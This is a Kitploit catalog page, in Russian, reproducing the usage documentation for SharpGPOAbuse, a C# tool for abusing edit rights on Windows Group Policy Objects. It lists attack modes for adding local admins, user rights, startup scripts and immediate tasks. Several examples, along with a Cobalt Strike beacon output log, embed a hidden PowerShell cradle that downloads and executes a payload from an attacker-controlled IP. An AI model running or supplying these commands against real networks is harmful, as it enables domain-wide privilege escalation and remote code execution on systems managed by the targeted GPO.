Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SharpGPOAbuse — SharpGPOAbuse — это .NET-приложение, написанное на C#, которое может использоваться для использования прав пользователя на редактирование объекта групповой политики (GPO) с целью компрометации объектов, управляемых этой GPO. | Kitploit
Инструменты/GitHubGitHub/reverseclabs/sharpgpoabuse
Повышение привилегийМеханизмы персистентностиЭксплуатацияЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubreverseclabs/sharpgpoabuse

SharpGPOAbuse

SharpGPOAbuse — это .NET-приложение, написанное на C#, которое может использоваться для использования прав пользователя на редактирование объекта групповой политики (GPO) с целью компрометации объектов, управляемых этой GPO.

Репозиторий
1.4k1555 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SharpGPOAbuse

SharpGPOAbuse — это .NET-приложение на C#, которое позволяет использовать права пользователя на редактирование объекта групповой политики (GPO) для компрометации объектов, управляемых этой политикой.

Подробнее можно узнать в следующей записи блога: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse

Инструкции по компиляции

Убедитесь, что необходимые пакеты NuGet установлены корректно, и просто соберите проект в Visual Studio.

Использование

root@kitploit:~
Usage:
        SharpGPOAbuse.exe <AttackType> <AttackOptions>

Типы атак

В настоящее время SharpGPOAbuse поддерживает следующие опции:

ОпцияОписание
--AddUserRightsДобавить права пользователю
--AddLocalAdminДобавить пользователя в локальную группу администраторов
--AddComputerScriptДобавить новый сценарий запуска компьютера
--AddUserScriptНастроить сценарий входа пользователя
--AddComputerTaskНастроить немедленную задачу компьютера
--AddUserTaskДобавить немедленную задачу пользователю

Опции атак

Добавление прав пользователя

root@kitploit:~
Options required to add new user rights:
--UserRights
        Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
        Set the account to add the new rights.
--GPOName
        The name of the vulnerable GPO.
        
Example:
        SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

Добавление локального администратора

root@kitploit:~
Options required to add a new local admin:
--UserAccount
        Set the name of the account to be added in local admins.
--GPOName
        The name of the vulnerable GPO.

Example:
        SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Настройка сценария входа пользователя или компьютера

root@kitploit:~
Options required to add a new user or computer startup script:
--ScriptName
        Set the name of the new startup script.
--ScriptContents
        Set the contents of the new startup script.
--GPOName
        The name of the vulnerable GPO.

Example: 
        SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Если вы хотите запускать вредоносный сценарий только на конкретном пользователе или компьютере, управляемом уязвимым GPO, вы можете добавить оператор if внутри вредоносного сценария:

root@kitploit:~
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Настройка немедленной задачи компьютера или пользователя

root@kitploit:~
Options required to add a new computer or user immediate task:

--TaskName
        Set the name of the new computer task.
--Author
        Set the author of the new task (use a DA account).
--Command
        Command to execute.
--Arguments
        Arguments passed to the command.
--GPOName
        The name of the vulnerable GPO.

Additional User Task Options:
--FilterEnabled
        Enable Target Filtering for user immediate tasks.
--TargetUsername
        The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
        The targeted user's SID.

Additional Computer Task Options:
--FilterEnabled
        Enable Target Filtering for computer immediate tasks.
--TargetDnsName
        The DNS name of the computer to target. The malicious task will run only on the specified host.
        
Example: 
        SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Если вы хотите запускать вредоносную задачу только на конкретном пользователе или компьютере, управляемом уязвимым GPO, вы можете использовать нечто подобное:

root@kitploit:~
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com

Дополнительные опции

ОпцияОписание
--DomainControllerУказать целевой контроллер домена
--DomainУказать целевой домен
--ForceПерезаписывать существующие файлы при необходимости

Пример вывода

root@kitploit:~
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I
EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
Скачать инструмент